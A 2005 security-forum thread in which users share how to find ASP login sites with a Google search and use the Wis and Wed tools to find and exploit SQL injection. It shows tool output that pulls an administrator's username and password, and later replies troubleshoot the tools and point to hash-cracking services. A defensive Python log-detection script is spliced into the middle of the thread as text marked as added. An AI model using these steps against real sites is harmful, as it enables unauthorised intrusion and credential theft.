Waraxe IT Security Portal
Sql injection tools Wed&Wis
Posted: Thu Jan 13, 2005 4:02 pm
Regular user
Joined: Nov 21, 2004
Posts: 11
Location: Estonia

I found 2 tools to automate the SQL injection process. I tested them and got some users/passwds :) My tests also showed that they missed some SQL injections :(
Here's how to use them:
First I searched with Google for some ASP sites like this: "allinurl:/login.asp". Next I used Wis (Web Injection Scanner - searches the web for SQL injection), and if it found a hole I started Wed (Web Entry Detector) to exploit the injection. The tools can be downloaded from here:
It goes like this:


C:\>wis http://www.someaspsite.com/

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com

Scanning http://www.someaspsite.com/, Page: Unlimited
Patient, Please....

(001 + 000) Checking: /shownews.asp?newsid=204
SQL Injection Found: /shownews.asp?newsid=204

Injection Page Final Result:


To detect access pages, add "/A" to the end of the command:


C:\>wis http://www.someaspsite.com/ /A

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com

Scanning http://www.someaspsite.com/, Page: Unlimited, Detect Access Page
Patient, Please....

(004 + 005) Access Page: /www.asp
(004 + 006) Access Page: /wwwstats.asp
(004 + 006) Access Page: /wwwlog.asp
(004 + 006) Access Page: /wstats.asp
(004 + 006) Access Page: /work.asp
(005 + 007) Access Page: /webstats.asp
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp

Access Page Final Result:
/gansu2/login.asp (200 OK)

Scan Finished


When you successfully find an SQL injection with Wis, the next step is to use Wed with the vulnerable URL:


C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544

Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26
http://www.netXeyes.com, security@vip.sina.com

#### Phrase 0: Check Enviroment ####
Get Row 1, Set Sensitive 250, Max Threads is 30
File C:\TableName.dic Opened
File C:\UserField.dic Opened
File C:\PassField.dic Opened

#### Phrase 1: Process Argv ####

#### Phrase 2: Detect SQL Injection ####
SQL Injection Detected.

#### Phrase 3: Get Cookies ####
Tag: 2017

#### Phrase 4: Starting Get Table Name ####
Tag: 45
Got Table Name is "users"

#### Phrase 5: Starting Get Name Field ####
Tag: 45
Got Name Field is "name"

#### Phrase 6: Starting Get Length of Field "name" ####
Tag: 24
Got Length of Field "name" is: 13

#### Phrase 7: Starting Get Password Field ####
Tag: 45
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 9

#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) ####

name is: administrator
pwd is: admin@bvn


Happy Injecting :P
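Seen from the server side, the two stages in the post above leave a pattern in the web log: Wis appears to request many admin-page candidates that do not exist, and Wed's dictionary and brute-force phases hit one page with a long run of different query strings. The following Python sketch is an added example, not part of the original post or of the tools; the seven-field log layout, the thresholds and the sample lines are assumptions constructed for illustration.

```python
from collections import defaultdict

# Assumed thresholds; tune against your own baseline traffic.
MAX_DISTINCT_QUERIES = 20   # distinct query strings per (client, page)
MAX_ADMIN_MISSES = 5        # distinct admin-like paths answered 404 per client
ADMIN_HINTS = ("admin", "manage", "login")

def parse(line):
    """Split one line: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    parts = line.split()
    if len(parts) != 7 or not parts[6].isdigit():
        return None  # header, comment or malformed line
    return parts[2], parts[4].lower(), parts[5], int(parts[6])

def find_scanners(lines):
    """Return {client_ip: [reasons]} for clients matching either pattern."""
    queries = defaultdict(set)   # (ip, page) -> distinct query strings
    misses = defaultdict(set)    # ip -> admin-like paths that returned 404
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, stem, query, status = rec
        if query != "-":
            queries[(ip, stem)].add(query)
        if status == 404 and any(h in stem for h in ADMIN_HINTS):
            misses[ip].add(stem)
    alerts = defaultdict(list)
    for (ip, stem), qs in sorted(queries.items()):
        if len(qs) > MAX_DISTINCT_QUERIES:
            alerts[ip].append(f"{len(qs)} distinct queries on {stem}")
    for ip, paths in sorted(misses.items()):
        if len(paths) > MAX_ADMIN_MISSES:
            alerts[ip].append(f"{len(paths)} admin-page probes returned 404")
    return dict(alerts)

def sample_log():
    """Constructed sample: one normal visitor and one scanning client."""
    log = ["#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
           "2005-01-13 16:00:01 198.51.100.9 GET /shownews.asp newsid=204 200",
           "2005-01-13 16:00:09 198.51.100.9 GET /login.asp - 200"]
    for name in ("admin", "admin_index", "index_admin", "admin_del", "manage", "admin_login"):
        log.append(f"2005-01-13 16:02:00 203.0.113.7 GET /{name}.asp - 404")
    for i in range(30):  # PROBEn is a placeholder, not a real payload
        log.append(f"2005-01-13 16:03:00 203.0.113.7 GET /shownews.asp newsid=1544+PROBE{i} 200")
    return log

if __name__ == "__main__":
    print(find_scanners(sample_log()))
```

The counts are per whole log; in production the same logic would run over a sliding time window so that slow legitimate browsing does not accumulate into an alert.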
Posted: Thu Jan 13, 2005 10:28 pm
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia

nice found


We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
Posted: Fri Jan 14, 2005 7:08 pm
Active user
Joined: Dec 02, 2004
Posts: 26

very good toolz thanks qr4t :D
This Tools is China Hacker rongxiao Public
Posted: Sat Jan 15, 2005 3:42 pm
Joined: Jan 15, 2005
Posts: 2


is very good
Posted: Sat Jan 15, 2005 5:29 pm
Regular user
Joined: Nov 29, 2004
Posts: 7


{ [ NCT ] }
Posted: Tue Jan 18, 2005 5:35 am
Joined: Jan 18, 2005
Posts: 1

Hi, first of all, sorry for my very very very bad English :oops:
Congratulations on the wis & wed programs. :D
I have a problem. The first step with wis is OK! For example, I got this:
Page Found: /admin/login.asp (401 AuthReq)
Page Found: /admin/default.asp (401 AuthReq)
Page Found: /admin/index.asp (401 AuthReq)
Page Found: /admin/manage.asp (401 AuthReq)

Access Page Final Result:
/admin/manage.asp (401 AuthReq)
/admin/index.asp (401 AuthReq)
/admin/default.asp (401 AuthReq)
/admin/login.asp (401 AuthReq)

Now, I don't know what to do with these results in step 2 with the wed program :cry:
Can anyone help me please?
Sorry one more time for my bad English :oops:
What about using proxy with the wis usage ?
Posted: Tue Jan 18, 2005 3:34 pm
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus

is there a -p or anything in the usage to use proxy .. ?
Posted: Tue Jan 18, 2005 6:09 pm
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus

Hello again .. I have run this expl from another PC and I have managed to get to the point where it is using brute force

#### Phrase 7: Starting Get Password Field ####
Tag: 332
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 5

#### Phrase 9: Starting Brute Field "administrators" and "pwd" (Access Mode) ###
Brute Force "administrators": ktu' "pwd": VB?<Y "!ln=Zry(),.v&kHJaEIKb(R$),Q<S>
C:\Documents and Settings\xxxx\Desktop\wed>

and while it is working the program crashes... any ideas why?
Posted: Fri Mar 18, 2005 9:53 pm
Joined: Mar 18, 2005
Posts: 1

#### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k

user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk

I have gotten the name and password but is it hashed? I can't log in with this info!
Posted: Tue Mar 29, 2005 8:46 am
Regular user
Joined: Jun 20, 2004
Posts: 5

it comes from China!
Posted: Wed Mar 30, 2005 10:32 am
Joined: Feb 12, 2005
Posts: 3

Why do I get this error: admin.txt not found? I have admin.txt in the same directory. Can someone help me.. :?:
Posted: Tue Jul 05, 2005 10:00 pm
Regular user
Joined: Jul 05, 2005
Posts: 18

wis doesn't seem to work for me, but wed, no problem.

understand.. when I launch wis, with or without params, the program stops without checking anything.. no error message, nothing, it just stops.
hashed password
Posted: Thu Jul 07, 2005 4:31 pm
Regular user
Joined: Jul 04, 2005
Posts: 6

kunfuzed wrote:
#### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k

user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk

I have gotten the name and password but is it hashed? I can't log in with this info!

Well, if the password is hashed with the MD5 algorithm, try using this:
If it is SHA-1 or unsalted MD5, try http://passcracking.com/
Posted: Thu Jul 07, 2005 6:10 pm
Regular user
Joined: Jun 27, 2005
Posts: 22

Downloaded it, how do I use it?
Posted: Thu Jul 14, 2005 12:37 pm
Regular user
Joined: Jul 04, 2005
Posts: 6

md5crack xxx
xxx - type your hash here